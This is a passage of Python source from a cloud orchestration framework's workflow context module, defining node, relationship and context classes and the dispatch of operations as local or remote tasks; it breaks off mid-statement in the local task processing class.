All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\nfrom __future__ import absolute_import\n\nimport functools\nimport copy\nimport uuid\nimport threading\nimport logging\n\nfrom proxy_tools import proxy\n\nfrom cloudify import amqp_client, context\nfrom cloudify._compat import queue\nfrom cloudify.manager import (get_bootstrap_context,\n get_rest_client,\n download_resource)\nfrom cloudify.workflows.tasks import (TASK_FAILED,\n TASK_SUCCEEDED,\n TASK_RESCHEDULED,\n RemoteWorkflowTask,\n LocalWorkflowTask,\n NOPLocalWorkflowTask,\n DryRunLocalWorkflowTask,\n DEFAULT_TOTAL_RETRIES,\n DEFAULT_RETRY_INTERVAL,\n DEFAULT_SEND_TASK_EVENTS,\n DEFAULT_SUBGRAPH_TOTAL_RETRIES,\n _SetNodeInstanceStateTask,\n _GetNodeInstanceStateTask,\n _SendNodeEventTask,\n _SendWorkflowEventTask,\n _UpdateExecutionStatusTask)\nfrom cloudify.constants import MGMTWORKER_QUEUE\nfrom cloudify import utils, logs, exceptions\nfrom cloudify.state import current_workflow_ctx\nfrom cloudify.workflows import events\nfrom cloudify.error_handling import deserialize_known_exception\nfrom cloudify.workflows.tasks_graph import TaskDependencyGraph\nfrom cloudify.amqp_client_utils import AMQPWrappedThread\nfrom cloudify.logs import (CloudifyWorkflowLoggingHandler,\n CloudifyWorkflowNodeLoggingHandler,\n SystemWideWorkflowLoggingHandler,\n init_cloudify_logger,\n send_workflow_event,\n send_sys_wide_wf_event)\nfrom cloudify.models_states import DeploymentModificationState\n\nfrom cloudify.utils import is_agent_alive\n\n\ntry:\n from collections import OrderedDict\nexcept ImportError:\n from ordereddict import OrderedDict\n\n\nDEFAULT_LOCAL_TASK_THREAD_POOL_SIZE = 8\n\n\nclass CloudifyWorkflowRelationshipInstance(object):\n \"\"\"\n A node instance relationship instance\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node_instance: a CloudifyWorkflowNodeInstance instance\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n :param relationship_instance: A relationship dict from a NodeInstance\n instance (of the rest client model)\n \"\"\"\n\n def __init__(self, ctx, node_instance, nodes_and_instances,\n relationship_instance):\n self.ctx = ctx\n self.node_instance = node_instance\n self._nodes_and_instances = nodes_and_instances\n self._relationship_instance = relationship_instance\n self._relationship = node_instance.node.get_relationship(\n relationship_instance['target_name'])\n\n @property\n def target_id(self):\n \"\"\"The relationship target node id\"\"\"\n return self._relationship_instance.get('target_id')\n\n @property\n def target_node_instance(self):\n \"\"\"\n The relationship's target node CloudifyWorkflowNodeInstance instance\n \"\"\"\n return self._nodes_and_instances.get_node_instance(self.target_id)\n\n @property\n def relationship(self):\n \"\"\"The relationship object for this relationship instance\"\"\"\n return self._relationship\n\n def execute_source_operation(self,\n operation,\n kwargs=None,\n allow_kwargs_override=False,\n 
send_task_events=DEFAULT_SEND_TASK_EVENTS):\n \"\"\"\n Execute a node relationship source operation\n\n :param operation: The node relationship operation\n :param kwargs: optional kwargs to be passed to the called operation\n \"\"\"\n return self.ctx._execute_operation(\n operation,\n node_instance=self.node_instance,\n related_node_instance=self.target_node_instance,\n operations=self.relationship.source_operations,\n kwargs=kwargs,\n allow_kwargs_override=allow_kwargs_override,\n send_task_events=send_task_events)\n\n def execute_target_operation(self,\n operation,\n kwargs=None,\n allow_kwargs_override=False,\n send_task_events=DEFAULT_SEND_TASK_EVENTS):\n \"\"\"\n Execute a node relationship target operation\n\n :param operation: The node relationship operation\n :param kwargs: optional kwargs to be passed to the called operation\n \"\"\"\n return self.ctx._execute_operation(\n operation,\n node_instance=self.target_node_instance,\n related_node_instance=self.node_instance,\n operations=self.relationship.target_operations,\n kwargs=kwargs,\n allow_kwargs_override=allow_kwargs_override,\n send_task_events=send_task_events)\n\n\nclass CloudifyWorkflowRelationship(object):\n \"\"\"\n A node relationship\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node: a CloudifyWorkflowNode instance\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n :param relationship: a relationship dict from a Node instance (of the\n rest client mode)\n \"\"\"\n\n def __init__(self, ctx, node, nodes_and_instances, relationship):\n self.ctx = ctx\n self.node = node\n self._nodes_and_instances = nodes_and_instances\n self._relationship = relationship\n\n @property\n def target_id(self):\n \"\"\"The relationship target node id\"\"\"\n return self._relationship.get('target_id')\n\n @property\n def target_node(self):\n \"\"\"The relationship target node WorkflowContextNode instance\"\"\"\n return self._nodes_and_instances.get_node(self.target_id)\n\n @property\n def source_operations(self):\n \"\"\"The relationship source operations\"\"\"\n return self._relationship.get('source_operations', {})\n\n @property\n def target_operations(self):\n \"\"\"The relationship target operations\"\"\"\n return self._relationship.get('target_operations', {})\n\n @property\n def properties(self):\n return self._relationship.get('properties', {})\n\n def is_derived_from(self, other_relationship):\n \"\"\"\n :param other_relationship: a string like\n cloudify.relationships.contained_in\n \"\"\"\n return other_relationship in self._relationship[\"type_hierarchy\"]\n\n\nclass CloudifyWorkflowNodeInstance(object):\n \"\"\"\n A plan node instance\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node: a CloudifyWorkflowContextNode instance\n :param node_instance: a NodeInstance (rest client response model)\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n \"\"\"\n\n def __init__(self, ctx, node, node_instance, nodes_and_instances):\n self.ctx = ctx\n self._node = node\n self._node_instance = node_instance\n # Directly contained node instances. 
Filled in the context's __init__()\n self._contained_instances = []\n self._relationship_instances = OrderedDict(\n (relationship_instance['target_id'],\n CloudifyWorkflowRelationshipInstance(\n self.ctx, self, nodes_and_instances,\n relationship_instance))\n for relationship_instance in node_instance.relationships)\n\n # adding the node instance to the node instances map\n node._node_instances[self.id] = self\n\n self._logger = None\n\n def set_state(self, state):\n \"\"\"\n Set the node state\n\n :param state: The node state\n :return: the state set\n \"\"\"\n # We don't want to alter the state of the instance during a dry run\n if self.ctx.dry_run:\n return NOPLocalWorkflowTask(self.ctx)\n\n set_state_task = _SetNodeInstanceStateTask(self.id, state)\n\n return self.ctx.local_task(\n local_task=set_state_task,\n node=self,\n info=state)\n\n def get_state(self):\n \"\"\"\n Get the node state\n\n :return: The node state\n \"\"\"\n get_state_task = _GetNodeInstanceStateTask(self.id)\n return self.ctx.local_task(\n local_task=get_state_task,\n node=self)\n\n def send_event(self, event, additional_context=None):\n \"\"\"\n Sends a workflow node event to RabbitMQ\n\n :param event: The event\n :param additional_context: additional context to be added to the\n context\n \"\"\"\n send_event_task = _SendNodeEventTask(\n self.id, event, additional_context)\n return self.ctx.local_task(\n local_task=send_event_task,\n node=self,\n info=event)\n\n def execute_operation(self,\n operation,\n kwargs=None,\n allow_kwargs_override=False,\n send_task_events=DEFAULT_SEND_TASK_EVENTS):\n \"\"\"\n Execute a node operation\n\n :param operation: The node operation\n :param kwargs: optional kwargs to be passed to the called operation\n \"\"\"\n return self.ctx._execute_operation(\n operation=operation,\n node_instance=self,\n operations=self.node.operations,\n kwargs=kwargs,\n allow_kwargs_override=allow_kwargs_override,\n send_task_events=send_task_events)\n\n @property\n def id(self):\n \"\"\"The node instance id\"\"\"\n return self._node_instance.id\n\n @property\n def state(self):\n \"\"\"The node instance state\"\"\"\n return self._node_instance.state\n\n @property\n def node_id(self):\n \"\"\"The node id (this instance is an instance of that node)\"\"\"\n return self._node_instance.node_id\n\n @property\n def relationships(self):\n \"\"\"The node relationships\"\"\"\n return iter(self._relationship_instances.values())\n\n @property\n def node(self):\n \"\"\"The node object for this node instance\"\"\"\n return self._node\n\n @property\n def modification(self):\n \"\"\"Modification enum (None, added, removed)\"\"\"\n return self._node_instance.get('modification')\n\n @property\n def scaling_groups(self):\n return self._node_instance.get('scaling_groups', [])\n\n @property\n def logger(self):\n \"\"\"A logger for this workflow node\"\"\"\n if self._logger is None:\n self._logger = self._init_cloudify_logger()\n return self._logger\n\n def _init_cloudify_logger(self):\n logger_name = '{0}-{1}'.format(self.ctx.execution_id, self.id)\n logging_handler = self.ctx.internal.handler.get_node_logging_handler(\n self)\n return init_cloudify_logger(logging_handler, logger_name)\n\n @property\n def contained_instances(self):\n \"\"\"\n Returns node instances directly contained in this instance (children)\n \"\"\"\n return self._contained_instances\n\n def _add_contained_node_instance(self, node_instance):\n self._contained_instances.append(node_instance)\n\n def get_contained_subgraph(self):\n \"\"\"\n Returns a set 
containing this instance and all nodes that are\n contained directly and transitively within it\n \"\"\"\n result = set([self])\n for child in self.contained_instances:\n result.update(child.get_contained_subgraph())\n return result\n\n\nclass CloudifyWorkflowNode(object):\n \"\"\"\n A plan node instance\n\n :param ctx: a CloudifyWorkflowContext instance\n :param node: a Node instance (rest client response model)\n :param nodes_and_instances: a WorkflowNodesAndInstancesContainer instance\n \"\"\"\n\n def __init__(self, ctx, node, nodes_and_instances):\n self.ctx = ctx\n self._node = node\n self._relationships = OrderedDict(\n (relationship['target_id'], CloudifyWorkflowRelationship(\n self.ctx, self, nodes_and_instances, relationship))\n for relationship in node.relationships)\n self._node_instances = {}\n\n @property\n def id(self):\n \"\"\"The node id\"\"\"\n return self._node.id\n\n @property\n def type(self):\n \"\"\"The node type\"\"\"\n return self._node.type\n\n @property\n def type_hierarchy(self):\n \"\"\"The node type hierarchy\"\"\"\n return self._node.type_hierarchy\n\n @property\n def properties(self):\n \"\"\"The node properties\"\"\"\n return self._node.properties\n\n @property\n def plugins_to_install(self):\n \"\"\"\n The plugins to install in this node. (Only relevant for host nodes)\n \"\"\"\n return self._node.get('plugins_to_install', [])\n\n @property\n def plugins(self):\n \"\"\"\n The plugins associated with this node\n \"\"\"\n return self._node.get('plugins', [])\n\n @property\n def host_id(self):\n return self._node.host_id\n\n @property\n def host_node(self):\n return self.ctx.get_node(self.host_id)\n\n @property\n def number_of_instances(self):\n return self._node.number_of_instances\n\n @property\n def relationships(self):\n \"\"\"The node relationships\"\"\"\n return iter(self._relationships.values())\n\n @property\n def operations(self):\n \"\"\"The node operations\"\"\"\n return self._node.operations\n\n @property\n def instances(self):\n \"\"\"The node instances\"\"\"\n return iter(self._node_instances.values())\n\n def get_relationship(self, target_id):\n \"\"\"Get a node relationship by its target id\"\"\"\n return self._relationships.get(target_id)\n\n\nclass _WorkflowContextBase(object):\n\n def __init__(self, ctx, remote_ctx_handler_cls):\n self._context = ctx = ctx or {}\n self._local_task_thread_pool_size = ctx.get(\n 'local_task_thread_pool_size',\n DEFAULT_LOCAL_TASK_THREAD_POOL_SIZE)\n self._task_retry_interval = ctx.get('task_retry_interval',\n DEFAULT_RETRY_INTERVAL)\n self._task_retries = ctx.get('task_retries',\n DEFAULT_TOTAL_RETRIES)\n self._subgraph_retries = ctx.get('subgraph_retries',\n DEFAULT_SUBGRAPH_TOTAL_RETRIES)\n self._logger = None\n\n if self.local:\n storage = ctx.pop('storage')\n handler = LocalCloudifyWorkflowContextHandler(self, storage)\n else:\n handler = remote_ctx_handler_cls(self)\n\n self._internal = CloudifyWorkflowContextInternal(self, handler)\n # is this execution being resumed? 
set to True if at the beginning\n # of handling the execution, the status was already STARTED\n self.resume = False\n\n def graph_mode(self):\n \"\"\"\n Switch the workflow context into graph mode\n\n :return: A task dependency graph instance\n \"\"\"\n if self.internal.task_graph.tasks:\n raise RuntimeError('Cannot switch to graph mode when tasks have '\n 'already been executed')\n\n self.internal.graph_mode = True\n return self.internal.task_graph\n\n @property\n def bootstrap_context(self):\n return self.internal._bootstrap_context\n\n @property\n def internal(self):\n return self._internal\n\n @property\n def execution_id(self):\n \"\"\"The execution id\"\"\"\n return self._context.get('execution_id')\n\n @property\n def workflow_id(self):\n \"\"\"The workflow id\"\"\"\n return self._context.get('workflow_id')\n\n @property\n def rest_token(self):\n \"\"\"REST service token\"\"\"\n return self._context.get('rest_token')\n\n @property\n def rest_host(self):\n return self._context.get('rest_host')\n\n @property\n def execution_token(self):\n \"\"\"The token of the current execution\"\"\"\n return self._context.get('execution_token')\n\n @property\n def bypass_maintenance(self):\n \"\"\"If true, all requests sent bypass maintenance mode.\"\"\"\n return self._context.get('bypass_maintenance', False)\n\n @property\n def tenant_name(self):\n \"\"\"Cloudify tenant name\"\"\"\n return self.tenant.get('name')\n\n @property\n def local(self):\n \"\"\"Is the workflow running in a local or remote context\"\"\"\n return self._context.get('local', False)\n\n @property\n def dry_run(self):\n return self._context.get('dry_run', False)\n\n @property\n def wait_after_fail(self):\n return self._context.get('wait_after_fail', 600)\n\n @property\n def logger(self):\n \"\"\"A logger for this workflow\"\"\"\n if self._logger is None:\n self._logger = self._init_cloudify_logger()\n return self._logger\n\n @property\n def tenant(self):\n \"\"\"Cloudify tenant\"\"\"\n return self._context.get('tenant', {})\n\n @property\n def execution_creator_username(self):\n return self._context.get('execution_creator_username')\n\n def _init_cloudify_logger(self):\n logger_name = self.execution_id\n logging_handler = self.internal.handler.get_context_logging_handler()\n return init_cloudify_logger(logging_handler, logger_name)\n\n def download_resource(self, resource_path, target_path=None):\n \"\"\"Downloads a blueprint/deployment resource to target_path.\n\n This mirrors ctx.download_resource, but for workflow contexts.\n See CloudifyContext.download_resource.\n \"\"\"\n return self._internal.handler.download_deployment_resource(\n resource_path=resource_path,\n target_path=target_path)\n\n def send_event(self, event, event_type='workflow_stage',\n args=None,\n additional_context=None):\n \"\"\"\n Sends a workflow event to RabbitMQ\n\n :param event: The event\n :param event_type: The event type\n :param args: additional arguments that may be added to the message\n :param additional_context: additional context to be added to the\n context\n \"\"\"\n\n send_event_task = _SendWorkflowEventTask(\n event, event_type, args, additional_context)\n return self.local_task(\n local_task=send_event_task,\n info=event)\n\n def _execute_operation(self,\n operation,\n node_instance,\n operations,\n related_node_instance=None,\n kwargs=None,\n allow_kwargs_override=False,\n send_task_events=DEFAULT_SEND_TASK_EVENTS):\n kwargs = kwargs or {}\n op_struct = operations.get(operation)\n if op_struct is None:\n raise RuntimeError('{0} 
operation of node instance {1} does '\n 'not exist'.format(operation,\n node_instance.id))\n if not op_struct['operation']:\n return NOPLocalWorkflowTask(self)\n plugin_name = op_struct['plugin']\n # could match two plugins with different executors, one is enough\n # for our purposes (extract package details)\n plugin = [p for p in node_instance.node.plugins\n if p['name'] == plugin_name][0]\n operation_mapping = op_struct['operation']\n has_intrinsic_functions = op_struct['has_intrinsic_functions']\n operation_properties = op_struct.get('inputs', {})\n operation_executor = op_struct['executor']\n operation_total_retries = op_struct['max_retries']\n operation_retry_interval = op_struct['retry_interval']\n operation_timeout = op_struct.get('timeout', None)\n operation_timeout_recoverable = op_struct.get('timeout_recoverable',\n None)\n task_name = operation_mapping\n if operation_total_retries is None:\n total_retries = self.internal.get_task_configuration()[\n 'total_retries']\n else:\n total_retries = operation_total_retries\n\n if plugin and plugin['package_name'] and not self.local:\n client = get_rest_client()\n filter_plugin = {'package_name': plugin.get('package_name'),\n 'package_version': plugin.get('package_version')}\n managed_plugins = client.plugins.list(**filter_plugin)\n if managed_plugins:\n plugin['visibility'] = managed_plugins[0]['visibility']\n plugin['tenant_name'] = managed_plugins[0]['tenant_name']\n\n node_context = {\n 'node_id': node_instance.id,\n 'node_name': node_instance.node_id,\n 'plugin': {\n 'name': plugin_name,\n 'package_name': plugin.get('package_name'),\n 'package_version': plugin.get('package_version'),\n 'visibility': plugin.get('visibility'),\n 'tenant_name': plugin.get('tenant_name'),\n 'source': plugin.get('source')\n },\n 'operation': {\n 'name': operation,\n 'retry_number': 0,\n 'max_retries': total_retries\n },\n 'has_intrinsic_functions': has_intrinsic_functions,\n 'host_id': node_instance._node_instance.host_id,\n 'executor': operation_executor\n }\n # central deployment agents run on the management worker\n # so we pass the env to the dispatcher so it will be on a per\n # operation basis\n if operation_executor == 'central_deployment_agent':\n agent_context = self.bootstrap_context.get('cloudify_agent', {})\n node_context['execution_env'] = agent_context.get('env', {})\n\n if related_node_instance is not None:\n relationships = [rel.target_id\n for rel in node_instance.relationships]\n node_context['related'] = {\n 'node_id': related_node_instance.id,\n 'node_name': related_node_instance.node_id,\n 'is_target': related_node_instance.id in relationships\n }\n\n final_kwargs = self._merge_dicts(merged_from=kwargs,\n merged_into=operation_properties,\n allow_override=allow_kwargs_override)\n\n return self.execute_task(\n task_name,\n local=self.local,\n kwargs=final_kwargs,\n node_context=node_context,\n send_task_events=send_task_events,\n total_retries=total_retries,\n retry_interval=operation_retry_interval,\n timeout=operation_timeout,\n timeout_recoverable=operation_timeout_recoverable)\n\n @staticmethod\n def _merge_dicts(merged_from, merged_into, allow_override=False):\n result = copy.copy(merged_into)\n for key, value in merged_from.items():\n if not allow_override and key in merged_into:\n raise RuntimeError('Duplicate definition of {0} in operation'\n ' properties and in kwargs. 
To allow '\n 'redefinition, pass '\n '\"allow_kwargs_override\" to '\n '\"execute_operation\"'.format(key))\n result[key] = value\n return result\n\n def update_execution_status(self, new_status):\n \"\"\"\n Updates the execution status to new_status.\n Note that the workflow status gets automatically updated before and\n after its run (whether the run succeeded or failed)\n \"\"\"\n update_execution_status_task = _UpdateExecutionStatusTask(new_status)\n\n return self.local_task(\n local_task=update_execution_status_task,\n info=new_status)\n\n def _build_cloudify_context(self,\n task_id,\n task_name,\n node_context,\n timeout,\n timeout_recoverable):\n node_context = node_context or {}\n context = {\n '__cloudify_context': '0.3',\n 'type': 'operation',\n 'task_id': task_id,\n 'task_name': task_name,\n 'execution_id': self.execution_id,\n 'workflow_id': self.workflow_id,\n 'tenant': self.tenant,\n 'timeout': timeout,\n 'timeout_recoverable': timeout_recoverable\n }\n context.update(node_context)\n context.update(self.internal.handler.operation_cloudify_context)\n return context\n\n def execute_task(self,\n task_name,\n local=True,\n task_queue=None,\n task_target=None,\n kwargs=None,\n node_context=None,\n send_task_events=DEFAULT_SEND_TASK_EVENTS,\n total_retries=None,\n retry_interval=None,\n timeout=None,\n timeout_recoverable=None):\n \"\"\"\n Execute a task\n\n :param task_name: the task name\n :param kwargs: optional kwargs to be passed to the task\n :param node_context: Used internally by node.execute_operation\n \"\"\"\n # If deepcopy ever causes problems here it can be removed, but make\n # sure that WORKFLOWS_WORKER_PAYLOAD is not global in the manager repo\n kwargs = copy.deepcopy(kwargs) or {}\n task_id = str(uuid.uuid4())\n cloudify_context = self._build_cloudify_context(\n task_id,\n task_name,\n node_context,\n timeout,\n timeout_recoverable)\n kwargs['__cloudify_context'] = cloudify_context\n\n if self.dry_run:\n return DryRunLocalWorkflowTask(\n local_task=lambda: None,\n workflow_context=self,\n name=task_name,\n kwargs=kwargs\n )\n\n if local:\n # oh sweet circular dependency\n from cloudify import dispatch\n return self.local_task(local_task=dispatch.dispatch,\n info=task_name,\n name=task_name,\n kwargs=kwargs,\n task_id=task_id,\n send_task_events=send_task_events,\n total_retries=total_retries,\n retry_interval=retry_interval)\n else:\n return self.remote_task(task_queue=task_queue,\n task_target=task_target,\n kwargs=kwargs,\n cloudify_context=cloudify_context,\n task_id=task_id,\n send_task_events=send_task_events,\n total_retries=total_retries,\n retry_interval=retry_interval)\n\n def local_task(self,\n local_task,\n node=None,\n info=None,\n kwargs=None,\n task_id=None,\n name=None,\n send_task_events=DEFAULT_SEND_TASK_EVENTS,\n override_task_config=False,\n total_retries=None,\n retry_interval=None):\n \"\"\"\n Create a local workflow task\n\n :param local_task: A callable implementation for the task\n :param node: A node if this task is called in a node context\n :param info: Additional info that will be accessed and included\n in log messages\n :param kwargs: kwargs to pass to the local_task when invoked\n :param task_id: The task id\n \"\"\"\n global_task_config = self.internal.get_task_configuration()\n if hasattr(local_task, 'workflow_task_config'):\n decorator_task_config = local_task.workflow_task_config\n else:\n decorator_task_config = {}\n invocation_task_config = dict(\n local_task=local_task,\n node=node,\n info=info,\n kwargs=kwargs,\n 
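# per-invocation settings; the merge below gives these precedence over\n # the global task config, while the decorator config wins over them\n # unless override_task_config is True\n 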
send_task_events=send_task_events,\n task_id=task_id,\n name=name)\n if total_retries is not None:\n invocation_task_config['total_retries'] = total_retries\n if retry_interval is not None:\n invocation_task_config['retry_interval'] = retry_interval\n\n final_task_config = {}\n final_task_config.update(global_task_config)\n if override_task_config:\n final_task_config.update(decorator_task_config)\n final_task_config.update(invocation_task_config)\n else:\n final_task_config.update(invocation_task_config)\n final_task_config.update(decorator_task_config)\n\n return self._process_task(LocalWorkflowTask(\n workflow_context=self,\n **final_task_config))\n\n def remote_task(self,\n kwargs,\n cloudify_context,\n task_id,\n task_queue=None,\n task_target=None,\n send_task_events=DEFAULT_SEND_TASK_EVENTS,\n total_retries=None,\n retry_interval=None):\n \"\"\"\n Create a remote workflow task\n\n :param cloudify_context: A dict for creating the CloudifyContext\n used by the called task\n :param task_id: The task id\n \"\"\"\n task_configuration = self.internal.get_task_configuration()\n if total_retries is not None:\n task_configuration['total_retries'] = total_retries\n if retry_interval is not None:\n task_configuration['retry_interval'] = retry_interval\n return self._process_task(\n RemoteWorkflowTask(kwargs=kwargs,\n cloudify_context=cloudify_context,\n task_target=task_target,\n task_queue=task_queue,\n workflow_context=self,\n task_id=task_id,\n send_task_events=send_task_events,\n **task_configuration))\n\n def _process_task(self, task):\n if self.internal.graph_mode:\n return task\n else:\n self.internal.task_graph.add_task(task)\n return task.apply_async()\n\n def get_operations(self, graph_id):\n return self.internal.handler.get_operations(graph_id)\n\n def update_operation(self, operation_id, state):\n return self.internal.handler.update_operation(operation_id, state)\n\n def get_tasks_graph(self, name):\n return self.internal.handler.get_tasks_graph(self.execution_id, name)\n\n def store_tasks_graph(self, name, operations=None):\n return self.internal.handler.store_tasks_graph(\n self.execution_id, name, operations=operations)\n\n def store_operation(self, task, dependencies, graph_id):\n return self.internal.handler.store_operation(\n graph_id=graph_id, dependencies=dependencies, **task.dump())\n\n def remove_operation(self, operation_id):\n return self.internal.handler.remove_operation(operation_id)\n\n def get_execution(self, execution_id=None):\n \"\"\"\n Get the execution object for the current execution\n :param execution_id: optional id of the execution to fetch; defaults\n to the current execution\n :return: an `Execution` instance holding the execution's details\n \"\"\"\n if not execution_id:\n execution_id = self.execution_id\n return self.internal.handler.get_execution(execution_id)\n\n\nclass WorkflowNodesAndInstancesContainer(object):\n\n def __init__(self, workflow_context, raw_nodes, raw_node_instances):\n self._nodes = dict(\n (node.id, CloudifyWorkflowNode(workflow_context, node, self))\n for node in raw_nodes)\n\n self._node_instances = dict(\n (instance.id, CloudifyWorkflowNodeInstance(\n workflow_context, self._nodes[instance.node_id], instance,\n self))\n for instance in raw_node_instances)\n\n for inst in self._node_instances.values():\n for rel in inst.relationships:\n if rel.relationship.is_derived_from(\n \"cloudify.relationships.contained_in\"):\n rel.target_node_instance._add_contained_node_instance(inst)\n\n @property\n def nodes(self):\n return iter(self._nodes.values())\n\n @property\n def 
node_instances(self):\n return iter(self._node_instances.values())\n\n def get_node(self, node_id):\n \"\"\"\n Get a node by its id\n\n :param node_id: The node id\n :return: a CloudifyWorkflowNode instance for the node or None if\n not found\n \"\"\"\n return self._nodes.get(node_id)\n\n def get_node_instance(self, node_instance_id):\n \"\"\"\n Get a node instance by its id\n\n :param node_instance_id: The node instance id\n :return: a CloudifyWorkflowNodeInstance for the node instance or\n None if not found\n \"\"\"\n return self._node_instances.get(node_instance_id)\n\n def refresh_node_instances(self):\n if self.local:\n storage = self.internal.handler.storage\n raw_node_instances = storage.get_node_instances()\n else:\n rest = get_rest_client()\n raw_node_instances = rest.node_instances.list(\n deployment_id=self.deployment.id,\n _get_all_results=True)\n self._node_instances = dict(\n (instance.id, CloudifyWorkflowNodeInstance(\n self, self._nodes[instance.node_id], instance,\n self))\n for instance in raw_node_instances)\n\n\nclass CloudifyWorkflowContext(\n _WorkflowContextBase,\n WorkflowNodesAndInstancesContainer\n):\n \"\"\"\n A context used in workflow operations\n\n :param ctx: a cloudify_context workflow dict\n \"\"\"\n\n def __init__(self, ctx):\n with current_workflow_ctx.push(self):\n # Not using super() here, because\n # WorkflowNodesAndInstancesContainer's __init__() needs some data\n # to be prepared before calling it. It would be possible to\n # overcome this by using kwargs + super(...).__init__() in\n # _WorkflowContextBase, but the way it is now is self-explanatory.\n _WorkflowContextBase.__init__(self, ctx,\n RemoteCloudifyWorkflowContextHandler)\n self.blueprint = context.BlueprintContext(self._context)\n self.deployment = WorkflowDeploymentContext(self._context, self)\n\n if self.local:\n storage = self.internal.handler.storage\n raw_nodes = storage.get_nodes()\n raw_node_instances = storage.get_node_instances()\n else:\n rest = get_rest_client()\n raw_nodes = rest.nodes.list(\n deployment_id=self.deployment.id,\n _get_all_results=True,\n evaluate_functions=self.deployment.runtime_only_evaluation)\n raw_node_instances = rest.node_instances.list(\n deployment_id=self.deployment.id,\n _get_all_results=True)\n\n WorkflowNodesAndInstancesContainer.__init__(self, self, raw_nodes,\n raw_node_instances)\n\n def _build_cloudify_context(self, *args):\n context = super(\n CloudifyWorkflowContext,\n self\n )._build_cloudify_context(*args)\n context.update({\n 'blueprint_id': self.blueprint.id,\n 'deployment_id': self.deployment.id\n })\n return context\n\n\nclass CloudifySystemWideWorkflowContext(_WorkflowContextBase):\n\n def __init__(self, ctx):\n with current_workflow_ctx.push(self):\n super(CloudifySystemWideWorkflowContext, self).__init__(\n ctx,\n SystemWideWfRemoteContextHandler\n )\n self._dep_contexts = None\n\n class _ManagedCloudifyWorkflowContext(CloudifyWorkflowContext):\n def __enter__(self):\n self.internal.start_local_tasks_processing()\n\n def __exit__(self, *args, **kwargs):\n self.internal.stop_local_tasks_processing()\n\n @property\n def deployments_contexts(self):\n if self._dep_contexts is None:\n self._dep_contexts = {}\n\n rest = get_rest_client(tenant=self.tenant_name)\n deployments_list = rest.deployments.list(\n _include=['id', 'blueprint_id'],\n _get_all_results=True\n )\n for dep in deployments_list:\n # Failure to deepcopy will cause snapshot restore context hack\n # to be reset just before it's needed.\n dep_ctx = copy.deepcopy(self._context)\n 
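# each deployment works on its own deep copy of the context, so the\n # per-deployment mutations below cannot leak between the lazily\n # created contexts\n 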
dep_ctx['tenant']['name'] = self.tenant_name\n dep_ctx['deployment_id'] = dep.id\n dep_ctx['blueprint_id'] = dep.blueprint_id\n\n def lazily_loaded_ctx(dep_ctx):\n def lazy_ctx():\n if not hasattr(lazy_ctx, '_cached_ctx'):\n lazy_ctx._cached_ctx = \\\n self._ManagedCloudifyWorkflowContext(dep_ctx)\n return lazy_ctx._cached_ctx\n\n return proxy(lazy_ctx)\n\n self._dep_contexts[dep.id] = lazily_loaded_ctx(dep_ctx)\n return self._dep_contexts\n\n\nclass CloudifyWorkflowContextInternal(object):\n\n def __init__(self, workflow_context, handler):\n self.workflow_context = workflow_context\n self.handler = handler\n self._bootstrap_context = None\n self._graph_mode = False\n # the graph is always created internally for events to work properly\n # when graph mode is turned on this instance is returned to the user.\n subgraph_task_config = self.get_subgraph_task_configuration()\n self._task_graph = TaskDependencyGraph(\n workflow_context=workflow_context,\n default_subgraph_task_config=subgraph_task_config)\n\n # local task processing\n thread_pool_size = self.workflow_context._local_task_thread_pool_size\n self.local_tasks_processor = LocalTasksProcessing(\n self.workflow_context,\n thread_pool_size=thread_pool_size)\n\n def get_task_configuration(self):\n bootstrap_context = self._get_bootstrap_context()\n workflows = bootstrap_context.get('workflows', {})\n total_retries = workflows.get(\n 'task_retries',\n self.workflow_context._task_retries)\n retry_interval = workflows.get(\n 'task_retry_interval',\n self.workflow_context._task_retry_interval)\n return dict(total_retries=total_retries,\n retry_interval=retry_interval)\n\n def get_subgraph_task_configuration(self):\n bootstrap_context = self._get_bootstrap_context()\n workflows = bootstrap_context.get('workflows', {})\n subgraph_retries = workflows.get(\n 'subgraph_retries',\n self.workflow_context._subgraph_retries\n )\n return dict(total_retries=subgraph_retries)\n\n def _get_bootstrap_context(self):\n if self._bootstrap_context is None:\n self._bootstrap_context = self.handler.bootstrap_context\n return self._bootstrap_context\n\n @property\n def task_graph(self):\n return self._task_graph\n\n @property\n def graph_mode(self):\n return self._graph_mode\n\n @graph_mode.setter\n def graph_mode(self, graph_mode):\n self._graph_mode = graph_mode\n\n def send_task_event(self, state, task, event=None):\n send_task_event_func = self.handler.get_send_task_event_func(task)\n events.send_task_event(state, task, send_task_event_func, event)\n\n def send_workflow_event(self,\n event_type,\n message=None,\n args=None,\n additional_context=None):\n self.handler.send_workflow_event(event_type=event_type,\n message=message,\n args=args,\n additional_context=additional_context)\n\n def start_local_tasks_processing(self):\n self.local_tasks_processor.start()\n\n def stop_local_tasks_processing(self):\n self.local_tasks_processor.stop()\n\n def add_local_task(self, task):\n self.local_tasks_processor.add_task(task)\n\n\nclass LocalTasksProcessing(object):\n\n def __init__(self, workflow_ctx, thread_pool_size=1):\n self._local_tasks_queue = queue.Queue()\n self._local_task_processing_pool = []\n self._is_local_context = workflow_ctx.local\n for i in range(thread_pool_size):\n name = 'Task-Processor-{0}'.format(i + 1)\n if self._is_local_context:\n thread = threading.Thread(target=self._process_local_task,\n name=name, args=(workflow_ctx, ))\n thread.daemon = True\n else:\n # this is a remote workflow, use an AMQPWrappedThread\n thread = 
